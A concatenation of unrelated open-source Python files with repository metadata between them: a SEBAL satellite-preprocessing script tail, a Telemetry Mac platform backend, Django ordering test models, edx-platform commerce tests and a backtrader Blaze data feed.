for k, v in SEBAL_RUNS.iteritems():
VIIRS_Dict.setdefault(v['output_folder'], []).append(k)
'''
LST folder = output_folder_HANTS_end
NDVI folder = os.path.join(output_folder_HANTS, 'NDVI')
ALBEDO folder = os.path.join(output_folder_HANTS, 'Albedo')
SAVI folder = os.path.join(output_folder_HANTS, 'SAVI')
'''
VARS = ["NDVI", "Albedo"]
Letter_dict = {"NDVI":'B', "Albedo":'D'}
xfile = load_workbook(inputExcel)
sheet_additional = xfile.get_sheet_by_name('Additional_Input')
sheet_meteo = xfile.get_sheet_by_name('Meteo_Input')
sheet_soil = xfile.get_sheet_by_name('Soil_Input')
sheet_out_name = ''.join([os.path.splitext(os.path.basename(inputExcel))[0],'_SEBAL.xlsx'])
sheet_out_dir = os.path.dirname(inputExcel)
sheet_out_file_name = os.path.join(sheet_out_dir, sheet_out_name)
for output_name_run in VIIRS_Dict.keys():
# Get General parameters
Row_number = VIIRS_Dict[output_name_run][0]
Type_of_Run = SEBAL_RUNS.items()
VIIRS_date = output_name_run.split('_')[-1]
VIIRS_datetime= datetime.strptime(VIIRS_date, '%d%m%Y')
date_run = '%d%02d%02d' %(VIIRS_datetime.year,VIIRS_datetime.month,VIIRS_datetime.day)
# import LST
file_name_LST = os.path.join(output_folder_HANTS_end_sharp, 'LST_surface_temp_sharpened_%s.tif' %date_run )
sheet_additional['E%d'%(Row_number)] = str(file_name_LST)
# import NDVI and Albedo and water mask
for VAR_SINGLE in VARS:
Letter = Letter_dict[VAR_SINGLE]
file_name_VAR_single = os.path.join(output_folder_PreSEBAL, VAR_SINGLE, '%s_PROBAV_%s.tif' %(VAR_SINGLE, date_run))
sheet_additional['%s%d'%(Letter, Row_number)] = str(file_name_VAR_single)
# import Water Mask
sheet_additional['C%d'%(Row_number)] = str(WaterMask_outfolder_end_FileName)
# import p-factor
file_name_p_factor = os.path.join(output_folder_p_factor,'p_factor.tif')
sheet_soil['H%d'%(Row_number)] = str(file_name_p_factor)
# import p-factor
file_name_c_factor = os.path.join(output_folder_LUE, 'LUE_max.tif')
sheet_soil['I%d'%(Row_number)] = str(file_name_c_factor)
# import vegetation height
file_name_vegt_height = os.path.join(output_folder_HANTS_end_Veg,'Vegetation_Height_%s.tif' %date_run)
sheet_meteo['O%d'%(Row_number)] = str(file_name_vegt_height)
xfile.save(sheet_out_file_name)
'''
# If instantanious Transmissivity is calculated in PreSEBAL
if Check_Trans_inst == 1:
sheet['N%d'%(number)] = str(Transmissivity_inst_fileName)
xfile.save(inputExcel)
# If daily Transmissivity is calculated in PreSEBAL
if Check_Trans_24 == 1:
sheet_meteo['K%d'%(number)] = str(Transmissivity_24_fileName)
xfile.save(sheet_out_file_name)
'''
'''
############################################# Create Outlier maps for PROBA-V #########################################
# Create output folder if not exists
output_folder_HANTS_outliers = os.path.join(output_folder_HANTS, 'Outliers')
if not os.path.exists(output_folder_HANTS_outliers):
os.mkdir(output_folder_HANTS_outliers)
fh = Dataset(nc_path_albedo, mode='r')
Var = fh.variables.keys()[-1]
data = fh.variables['outliers'][:]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() or 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_VAR,Back_name)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(data)[2])):
time_now = time[i]
data_now = data[:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers, 'Outliers_PROBAV_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data_now, name_out, shape, nband=1)
############################################ NDVI ##################################################
# Create output folder if not exists
output_folder_HANTS_outliers = os.path.join(output_folder_HANTS, 'Outliers_NDVI')
if not os.path.exists(output_folder_HANTS_outliers):
os.mkdir(output_folder_HANTS_outliers)
fh = Dataset(nc_path_ndvi, mode='r')
Var = fh.variables.keys()[-1]
data = fh.variables['outliers'][:]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() or 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_VAR,Back_name)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(data)[2])):
time_now = time[i]
data_now = data[:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers, 'Outliers_PROBAV_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data_now, name_out, shape, nband=1)
###################################################### postHANTS Albedo ###############################################
for date in Dates:
year = date.year
month = date.month
day = date.day
filename_outliers = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_output\Outliers\Outliers_PROBAV_%d%02d%02d.tif" %(year,month,day)
filename_VIIRS_original = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_input\Albedo\Albedo_PROBAV_%d%02d%02d.tif" %(year,month,day)
filename_VIIRS_HANTS = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_output\Albedo\Albedo_PROBAV_%d%02d%02d.tif"%(year,month,day)
dest_outliers = gdal.Open(filename_outliers)
dest_VIIRS_original = gdal.Open(filename_VIIRS_original)
dest_VIIRS_HANTS = gdal.Open(filename_VIIRS_HANTS)
if not dest_VIIRS_original == None:
Array_outliers = dest_outliers.GetRasterBand(1).ReadAsArray()[:,:]
Array_VIIRS_original = dest_VIIRS_original.GetRasterBand(1).ReadAsArray()
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()[:,:]
Array_outliers[Array_outliers==-9999.] = 0
Array_outliers_mask = np.zeros(np.shape(Array_outliers))
Array_outliers_mask[Array_outliers==1.]=0
Array_outliers_mask[Array_outliers==0.]=1
Array_outliers_mask[Array_outliers_mask==0]=2
Array_outliers_mask[Array_outliers_mask==1]=0
Array_outliers_mask[Array_outliers_mask==2]=1
Array_outliers_mask = Create_Buffer(Array_outliers_mask)
Array_outliers_mask[Array_outliers_mask==1] = 2
Array_outliers_mask[Array_outliers_mask==0] = 1
Array_outliers_mask[Array_outliers_mask==2] = 0
if np.nansum(Array_outliers_mask) > 30:
Array_outliers_mask[Array_VIIRS_HANTS == 0] = np.nan
Array_VIIRS_original_mask_nan = Array_VIIRS_original * Array_outliers_mask
Array_VIIRS_HANTS_mask_nan = Array_VIIRS_HANTS * Array_outliers_mask
Array_VIIRS_original_mask_nan_flatten = Array_VIIRS_original_mask_nan.flatten()
Array_VIIRS_HANTS_mask_nan_flatten = Array_VIIRS_HANTS_mask_nan.flatten()
Array_VIIRS_original_mask_nan_flatten = Array_VIIRS_original_mask_nan_flatten[~np.isnan(Array_VIIRS_original_mask_nan_flatten)]
Array_VIIRS_HANTS_mask_nan_flatten = Array_VIIRS_HANTS_mask_nan_flatten[~np.isnan(Array_VIIRS_HANTS_mask_nan_flatten)]
Array_VIIRS_original_mask_nan_flatten_without_zero =Array_VIIRS_original_mask_nan_flatten[Array_VIIRS_original_mask_nan_flatten>0]
Array_VIIRS_original_mask_value_cold = np.percentile(Array_VIIRS_original_mask_nan_flatten_without_zero,40)
Array_VIIRS_original_mask_value_hot = np.percentile(Array_VIIRS_original_mask_nan_flatten_without_zero,90)
Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest = Array_VIIRS_HANTS_mask_nan_flatten[np.logical_and(Array_VIIRS_original_mask_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_nan_flatten < Array_VIIRS_original_mask_value_hot)]
Array_VIIRS_original_mask_nan_flatten_exc_coldest = Array_VIIRS_original_mask_nan_flatten[np.logical_and(Array_VIIRS_original_mask_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_nan_flatten < Array_VIIRS_original_mask_value_hot)]
Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest[Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest==-9999] = np.nan
Array_VIIRS_original_mask_nan_flatten_exc_coldest[Array_VIIRS_original_mask_nan_flatten_exc_coldest==-9999] = np.nan
Ave_VIIRS_HANTS = np.nanmean(Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest)
Ave_VIIRS_original = np.nanmean(Array_VIIRS_original_mask_nan_flatten_exc_coldest)
Factor = Ave_VIIRS_original/Ave_VIIRS_HANTS
Array_VIIRS_HANTS_Corrected = Array_VIIRS_HANTS * Factor
End_array = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array[Array_outliers_mask==0] =Array_VIIRS_HANTS_Corrected[Array_outliers_mask==0]
End_array[Array_outliers_mask==1] =Array_VIIRS_original[Array_outliers_mask==1]
else:
End_array = Array_VIIRS_HANTS
geo = dest_VIIRS_original.GetGeoTransform()
proj = dest_outliers.GetProjection()
else:
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()
End_array = Array_VIIRS_HANTS
dest_test = None
i = 0
while dest_test == None:
date2 = Dates[i]
year2 = date2.year
month2= date2.month
day2 = date2.day
try:
filename_VIIRS_original2 = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_input\Albedo\Albedo_PROBAV_%d%02d%02d.tif" %(year2,month2,day2)
dest_test = gdal.Open(filename_VIIRS_original2)
geo = dest_test.GetGeoTransform()
proj = dest_test.GetProjection()
except:
i+=1
import wa.General.data_conversions as DC
name = r"G:\SEBAL_Tadla\PROBAV-VIIRS\HANTS_end\Albedo\Albedo_PROBAV_%d%02d%02d.tif"%(year,month,day)
DC.Save_as_tiff(name, End_array, geo, proj)
################################## All input is now calculated, so preprosessing can start ########################
# Open preprosessing excel the Vegetation_Height sheet
ws_veg = wb_veg['Vegetation_Height']
# Define output name for the LandUse map
dst_FileName = os.path.join(output_folder,'LU_%s.tif' %Var_name)
# Open LU data
LU_dest = gdal.Open(LU_data_FileName)
LU_data = LU_dest.GetRasterBand(1).ReadAsArray()
# Reproject the LAI to the same projection as LU
dest1, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(LAI_FileName, LU_data_FileName) ## input after HANTS
LAI_proj = dest1.GetRasterBand(1).ReadAsArray()
# Read out the excel file coefficient numbers
Array = np.zeros([ws_veg.max_row-1,4])
for j in ['A','C','D','E']:
j_number={'A' : 0, 'C' : 1, 'D' : 2, 'E' : 3}
for i in range(2,ws_veg.max_row+1):
Value = (ws_veg['%s%s' %(j,i)].value)
Array[i-2, j_number[j]] = Value
# Create maps with the coefficient numbers for the right land cover
coeff = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1]),3])
for coeff_nmbr in range(0,3):
for Class in range(0,len(Array)):
coeff[LU_data==Array[Class,0],coeff_nmbr] = Array[Class,coeff_nmbr+1]
# Get some dimensions of the projected dataset
band_data = dest1.GetRasterBand(1)
ncol_data = dest1.RasterXSize
nrow_data = dest1.RasterYSize
shape_data=[ncol_data, nrow_data]
# Calculate the vegetation height in the LU projection
Veg_Height_proj = coeff[:,:,0] * np.power(LAI_proj,2) + coeff[:,:,1] * LAI_proj + coeff[:,:,2]
Veg_Height_proj = np.clip(Veg_Height_proj, 0, 600)
# Save the vegetation height in the lU projection in the temporary directory
Veg_Height_proj_FileName = os.path.join(output_folder_temp,'Veg_Height_proj.tif')
save_GeoTiff_proy(dest1, Veg_Height_proj, Veg_Height_proj_FileName, shape_data, nband=1)
# Reproject the Veg_height to the LAI projection
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Veg_Height_proj_FileName, LAI_FileName)
# Get some dimensions of the original dataset
band_data = dest.GetRasterBand(1)
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
# Open the Veg_height with the same projection as LAI
Veg_Height = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
Veg_Height[Veg_Height == 0] = np.nan
# Save Vegetation Height in the end folder
dst_FileName = os.path.join(output_folder,'Vegetation_Height_%s.tif' %Var_name)
save_GeoTiff_proy(dest, Veg_Height, dst_FileName, shape, nband=1)
######################## calculate p-factor by using the Landuse map #########################
ws_p = wb_veg['p-factor']
Array_P = np.zeros([ws_p.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_p.max_row+1):
Value = (ws_p['%s%s' %(j,i)].value)
Array_P[i-2, j_number[j]] = Value
p_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_P)):
p_factor[LU_data==Array_P[Class,0]] = Array_P[Class,1]
p_factor[p_factor == 0] = np.nan
dst_FileName = os.path.join(output_folder_temp,'p-factor_proj.tif')
save_GeoTiff_proy(dest1, p_factor, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
p_factor = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
p_factor[p_factor == 0] = np.nan
dst_pfactor_FileName = os.path.join(output_folder,'p-factor_%s.tif' %Var_name)
save_GeoTiff_proy(dest, p_factor, dst_pfactor_FileName, shape, nband=1)
######################## calculate c-factor by using the Landuse map #########################
ws_c = wb_veg['C-factor']
Array_C = np.zeros([ws_c.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_c.max_row+1):
Value = (ws_c['%s%s' %(j,i)].value)
Array_C[i-2, j_number[j]] = Value
c_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_C)):
c_factor[LU_data==Array_C[Class,0]] = Array_C[Class,1]
c_factor[np.logical_and(c_factor != 3.0, c_factor != 4.0)] = np.nan
LUE_max = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
LUE_max[c_factor == 3] = 2.5
LUE_max[c_factor == 4] = 4.5
LUE_max[LUE_max == 0] = np.nan
dst_FileName = os.path.join(output_folder_temp,'LUE_max_proj.tif')
save_GeoTiff_proy(dest1, LUE_max, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
LUE_max = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
LUE_max[LUE_max == 0] = np.nan
dst_LUEmax_FileName = os.path.join(output_folder,'LUE_max_%s.tif' %Var_name)
save_GeoTiff_proy(dest, LUE_max, dst_LUEmax_FileName, shape, nband=1)
############################# delete temporary directory ########################
shutil.rmtree(output_folder_temp)
#################################################################################
'''
# Functions
#################################################################################
def Create_Buffer(Data_In):
'''
This function creates a 3D array which is used to apply the moving window
'''
Buffer_area = 7 # A block of 2 times Buffer_area + 1 will be 1 if there is the pixel in the middle is 1
Data_Out=np.empty((len(Data_In),len(Data_In[1])))
Data_Out[:,:] = Data_In
for ypixel in range(0,Buffer_area + 1):
for xpixel in range(1,Buffer_area + 1):
if ypixel==0:
for xpixel in range(1,Buffer_area + 1):
Data_Out[:,0:-xpixel] += Data_In[:,xpixel:]
Data_Out[:,xpixel:] += Data_In[:,:-xpixel]
for ypixel in range(1,Buffer_area + 1):
Data_Out[ypixel:,:] += Data_In[:-ypixel,:]
Data_Out[0:-ypixel,:] += Data_In[ypixel:,:]
else:
Data_Out[0:-xpixel,ypixel:] += Data_In[xpixel:,:-ypixel]
Data_Out[xpixel:,ypixel:] += Data_In[:-xpixel,:-ypixel]
Data_Out[0:-xpixel,0:-ypixel] += Data_In[xpixel:,ypixel:]
Data_Out[xpixel:,0:-ypixel] += Data_In[:-xpixel,ypixel:]
Data_Out[Data_Out>0.1] = 1
Data_Out[Data_Out<=0.1] = 0
return(Data_Out)
#------------------------------------------------------------------------------
def Get_epsg(g):
try:
# Get info of the dataset that is used for transforming
gland_proj = g.GetProjection()
Projection=gland_proj.split('EPSG","')
epsg_to=int((str(Projection[-1]).split(']')[0])[0:-1])
except:
epsg_to=4326
print('Was not able to get the projection, so WGS84 is assumed')
return(epsg_to)
#------------------------------------------------------------------------------
def gap_filling(data,NoDataValue):
"""
This function fills the no data gaps in a numpy array
Keyword arguments:
dataset -- Array
NoDataValue -- Value that must be filled
"""
# fill the no data values
if NoDataValue is np.nan:
mask = ~(np.isnan(data))
else:
mask = ~(data==NoDataValue)
xx, yy = np.meshgrid(np.arange(data.shape[1]), np.arange(data.shape[0]))
xym = np.vstack( (np.ravel(xx[mask]), np.ravel(yy[mask])) ).T
data0 = np.ravel( data[:,:][mask] )
interp0 = scipy.interpolate.NearestNDInterpolator( xym, data0 )
data_end = interp0(np.ravel(xx), np.ravel(yy)).reshape( xx.shape )
return (data_end)
#------------------------------------------------------------------------------
if __name__ == '__main__':
main()
|
apache-2.0
|
benschmaus/catapult
|
telemetry/telemetry/internal/platform/mac_platform_backend.py
|
1
|
7073
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import ctypes
import os
import platform
import subprocess
import sys
import time
from telemetry.core import os_version as os_version_module
from telemetry import decorators
from telemetry.internal.platform import posix_platform_backend
from telemetry.internal.platform.power_monitor import powermetrics_power_monitor
from telemetry.util import process_statistic_timeline_data
try:
import resource # pylint: disable=import-error
except ImportError:
resource = None # Not available on all platforms
class MacPlatformBackend(posix_platform_backend.PosixPlatformBackend):
def __init__(self):
super(MacPlatformBackend, self).__init__()
self.libproc = None
self._power_monitor = powermetrics_power_monitor.PowerMetricsPowerMonitor(
self)
def GetSystemLog(self):
# Since the log file can be very large, only show the last 200 lines.
return subprocess.check_output(
['tail', '-n', '200', '/var/log/system.log'])
@classmethod
def IsPlatformBackendForHost(cls):
return sys.platform == 'darwin'
def IsThermallyThrottled(self):
raise NotImplementedError()
def HasBeenThermallyThrottled(self):
raise NotImplementedError()
def _GetIdleWakeupCount(self, pid):
top_output = self._GetTopOutput(pid, ['idlew'])
# Sometimes top won't return anything here, just ignore such cases -
# crbug.com/354812 .
if top_output[-2] != 'IDLEW':
return process_statistic_timeline_data.IdleWakeupTimelineData(pid, 0)
# Numbers reported by top may have a '+' appended.
wakeup_count = int(top_output[-1].strip('+ '))
return process_statistic_timeline_data.IdleWakeupTimelineData(pid,
wakeup_count)
def GetCpuStats(self, pid):
"""Returns a dict of cpu statistics for the process represented by |pid|."""
class ProcTaskInfo(ctypes.Structure):
"""Struct for proc_pidinfo() call."""
_fields_ = [("pti_virtual_size", ctypes.c_uint64),
("pti_resident_size", ctypes.c_uint64),
("pti_total_user", ctypes.c_uint64),
("pti_total_system", ctypes.c_uint64),
("pti_threads_user", ctypes.c_uint64),
("pti_threads_system", ctypes.c_uint64),
("pti_policy", ctypes.c_int32),
("pti_faults", ctypes.c_int32),
("pti_pageins", ctypes.c_int32),
("pti_cow_faults", ctypes.c_int32),
("pti_messages_sent", ctypes.c_int32),
("pti_messages_received", ctypes.c_int32),
("pti_syscalls_mach", ctypes.c_int32),
("pti_syscalls_unix", ctypes.c_int32),
("pti_csw", ctypes.c_int32),
("pti_threadnum", ctypes.c_int32),
("pti_numrunning", ctypes.c_int32),
("pti_priority", ctypes.c_int32)]
PROC_PIDTASKINFO = 4
def __init__(self):
self.size = ctypes.sizeof(self)
super(ProcTaskInfo, self).__init__() # pylint: disable=bad-super-call
proc_info = ProcTaskInfo()
if not self.libproc:
self.libproc = ctypes.CDLL(ctypes.util.find_library('libproc'))
self.libproc.proc_pidinfo(pid, proc_info.PROC_PIDTASKINFO, 0,
ctypes.byref(proc_info), proc_info.size)
# Convert nanoseconds to seconds.
cpu_time = (proc_info.pti_total_user / 1000000000.0 +
proc_info.pti_total_system / 1000000000.0)
results = {'CpuProcessTime': cpu_time,
'ContextSwitches': proc_info.pti_csw}
# top only reports idle wakeup count starting from OS X 10.9.
if self.GetOSVersionName() >= os_version_module.MAVERICKS:
results.update({'IdleWakeupCount': self._GetIdleWakeupCount(pid)})
return results
def GetCpuTimestamp(self):
"""Return current timestamp in seconds."""
return {'TotalTime': time.time()}
def GetSystemCommitCharge(self):
vm_stat = self.RunCommand(['vm_stat'])
for stat in vm_stat.splitlines():
key, value = stat.split(':')
if key == 'Pages active':
pages_active = int(value.strip()[:-1]) # Strip trailing '.'
return pages_active * resource.getpagesize() / 1024
return 0
@decorators.Cache
def GetSystemTotalPhysicalMemory(self):
return int(self.RunCommand(['sysctl', '-n', 'hw.memsize']))
def PurgeUnpinnedMemory(self):
# TODO(pliard): Implement this.
pass
@decorators.Deprecated(
2017, 11, 4,
'Clients should use tracing and memory-infra in new Telemetry '
'benchmarks. See for context: https://crbug.com/632021')
def GetMemoryStats(self, pid):
rss_vsz = self.GetPsOutput(['rss', 'vsz'], pid)
if rss_vsz:
rss, vsz = rss_vsz[0].split()
return {'VM': 1024 * int(vsz),
'WorkingSetSize': 1024 * int(rss)}
return {}
@decorators.Cache
def GetArchName(self):
return platform.machine()
def GetOSName(self):
return 'mac'
@decorators.Cache
def GetOSVersionName(self):
os_version = os.uname()[2]
if os_version.startswith('9.'):
return os_version_module.LEOPARD
if os_version.startswith('10.'):
return os_version_module.SNOWLEOPARD
if os_version.startswith('11.'):
return os_version_module.LION
if os_version.startswith('12.'):
return os_version_module.MOUNTAINLION
if os_version.startswith('13.'):
return os_version_module.MAVERICKS
if os_version.startswith('14.'):
return os_version_module.YOSEMITE
if os_version.startswith('15.'):
return os_version_module.ELCAPITAN
if os_version.startswith('16.'):
return os_version_module.SIERRA
raise NotImplementedError('Unknown mac version %s.' % os_version)
@decorators.Cache
def GetOSVersionDetailString(self):
product = subprocess.check_output(['sw_vers', '-productVersion']).strip()
build = subprocess.check_output(['sw_vers', '-buildVersion']).strip()
return product + ' ' + build
def CanTakeScreenshot(self):
return True
def TakeScreenshot(self, file_path):
return subprocess.call(['screencapture', file_path])
def CanFlushIndividualFilesFromSystemCache(self):
return False
def SupportFlushEntireSystemCache(self):
return self.HasRootAccess()
def FlushEntireSystemCache(self):
mavericks_or_later = self.GetOSVersionName() >= os_version_module.MAVERICKS
p = self.LaunchApplication('purge', elevate_privilege=mavericks_or_later)
p.communicate()
assert p.returncode == 0, 'Failed to flush system cache'
def CanMonitorPower(self):
return self._power_monitor.CanMonitorPower()
def CanMeasurePerApplicationPower(self):
return self._power_monitor.CanMeasurePerApplicationPower()
def StartMonitoringPower(self, browser):
self._power_monitor.StartMonitoringPower(browser)
def StopMonitoringPower(self):
return self._power_monitor.StopMonitoringPower()
|
bsd-3-clause
|
akintoey/django
|
tests/ordering/models.py
|
261
|
1379
|
"""
Specifying ordering
Specify default ordering for a model using the ``ordering`` attribute, which
should be a list or tuple of field names. This tells Django how to order
``QuerySet`` results.
If a field name in ``ordering`` starts with a hyphen, that field will be
ordered in descending order. Otherwise, it'll be ordered in ascending order.
The special-case field name ``"?"`` specifies random order.
The ordering attribute is not required. If you leave it off, ordering will be
undefined -- not random, just undefined.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class Author(models.Model):
class Meta:
ordering = ('-pk',)
@python_2_unicode_compatible
class Article(models.Model):
author = models.ForeignKey(Author, models.SET_NULL, null=True)
second_author = models.ForeignKey(Author, models.SET_NULL, null=True)
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
class Meta:
ordering = ('-pub_date', 'headline')
def __str__(self):
return self.headline
class OrderedByAuthorArticle(Article):
class Meta:
proxy = True
ordering = ('author', 'second_author')
class Reference(models.Model):
article = models.ForeignKey(OrderedByAuthorArticle, models.CASCADE)
class Meta:
ordering = ('article',)
|
bsd-3-clause
|
fintech-circle/edx-platform
|
lms/djangoapps/commerce/tests/test_utils.py
|
1
|
4317
|
"""Tests of commerce utilities."""
from django.conf import settings
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from mock import patch
from waffle.testutils import override_switch
from commerce.models import CommerceConfiguration
from commerce.utils import EcommerceService
from openedx.core.lib.log_utils import audit_log
from openedx.core.djangoapps.site_configuration.tests.test_util import with_site_configuration
from student.tests.factories import UserFactory
def update_commerce_config(enabled=False, checkout_page='/test_basket/'):
""" Enable / Disable CommerceConfiguration model """
CommerceConfiguration.objects.create(
checkout_on_ecommerce_service=enabled,
single_course_checkout_page=checkout_page,
)
class AuditLogTests(TestCase):
"""Tests of the commerce audit logging helper."""
@patch('openedx.core.lib.log_utils.log')
def test_log_message(self, mock_log):
"""Verify that log messages are constructed correctly."""
audit_log('foo', qux='quux', bar='baz')
# Verify that the logged message contains comma-separated
# key-value pairs ordered alphabetically by key.
message = 'foo: bar="baz", qux="quux"'
self.assertTrue(mock_log.info.called_with(message))
class EcommerceServiceTests(TestCase):
"""Tests for the EcommerceService helper class."""
SKU = 'TESTSKU'
def setUp(self):
self.request_factory = RequestFactory()
self.user = UserFactory.create()
self.request = self.request_factory.get("foo")
update_commerce_config(enabled=True)
super(EcommerceServiceTests, self).setUp()
def test_is_enabled(self):
"""Verify that is_enabled() returns True when ecomm checkout is enabled. """
is_enabled = EcommerceService().is_enabled(self.user)
self.assertTrue(is_enabled)
config = CommerceConfiguration.current()
config.checkout_on_ecommerce_service = False
config.save()
is_not_enabled = EcommerceService().is_enabled(self.user)
self.assertFalse(is_not_enabled)
@override_switch(settings.DISABLE_ACCOUNT_ACTIVATION_REQUIREMENT_SWITCH, active=True)
def test_is_enabled_activation_requirement_disabled(self):
"""Verify that is_enabled() returns True when ecomm checkout is enabled. """
self.user.is_active = False
self.user.save()
is_enabled = EcommerceService().is_enabled(self.user)
self.assertTrue(is_enabled)
@patch('openedx.core.djangoapps.theming.helpers.is_request_in_themed_site')
def test_is_enabled_for_microsites(self, is_microsite):
"""Verify that is_enabled() returns True if used for a microsite."""
is_microsite.return_value = True
is_enabled = EcommerceService().is_enabled(self.user)
self.assertTrue(is_enabled)
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_ecommerce_url_root(self):
"""Verify that the proper root URL is returned."""
self.assertEqual(EcommerceService().ecommerce_url_root, 'http://ecommerce_url')
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_get_absolute_ecommerce_url(self):
"""Verify that the proper URL is returned."""
url = EcommerceService().get_absolute_ecommerce_url('/test_basket/')
self.assertEqual(url, 'http://ecommerce_url/test_basket/')
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_get_receipt_page_url(self):
"""Verify that the proper Receipt page URL is returned."""
order_number = 'ORDER1'
url = EcommerceService().get_receipt_page_url(order_number)
expected_url = 'http://ecommerce_url/checkout/receipt/?order_number={}'.format(order_number)
self.assertEqual(url, expected_url)
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_checkout_page_url(self):
""" Verify the checkout page URL is properly constructed and returned. """
url = EcommerceService().checkout_page_url(self.SKU)
expected_url = 'http://ecommerce_url/test_basket/?sku={}'.format(self.SKU)
self.assertEqual(url, expected_url)
|
agpl-3.0
|
YuepengGuo/backtrader
|
backtrader/feeds/blaze.py
|
2
|
2832
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader import date2num
import backtrader.feed as feed
class BlazeData(feed.DataBase):
'''
Support for `Blaze <blaze.pydata.org>`_ ``Data`` objects.
Only numeric indices to columns are supported.
Note:
- The ``dataname`` parameter is a blaze ``Data`` object
- A negative value in any of the parameters for the Data lines
indicates it's not present in the DataFrame
it is
'''
params = (
# datetime must be present
('datetime', 0),
# pass -1 for any of the following to indicate absence
('open', 1),
('high', 2),
('low', 3),
('close', 4),
('volume', 5),
('openinterest', 6),
)
datafields = [
'datetime', 'open', 'high', 'low', 'close', 'volume', 'openinterest'
]
def start(self):
# reset the iterator on each start
self._rows = iter(self.p.dataname)
def _load(self):
try:
row = next(self._rows)
except StopIteration:
return False
# Set the standard datafields - except for datetime
for datafield in self.datafields[1:]:
# get the column index
colidx = getattr(self.params, datafield)
if colidx < 0:
# column not present -- skip
continue
# get the line to be set
line = getattr(self.lines, datafield)
line[0] = row[colidx]
# datetime - assumed blaze always serves a native datetime.datetime
colidx = getattr(self.params, self.datafields[0])
dt = row[colidx]
dtnum = date2num(dt)
# get the line to be set
line = getattr(self.lines, self.datafields[0])
line[0] = dtnum
# Done ... return
return True
|
gpl-3.0
|
wkeyword/pip
|
pip/_vendor/requests/packages/chardet/mbcssm.py
|
1783
|
19590
|
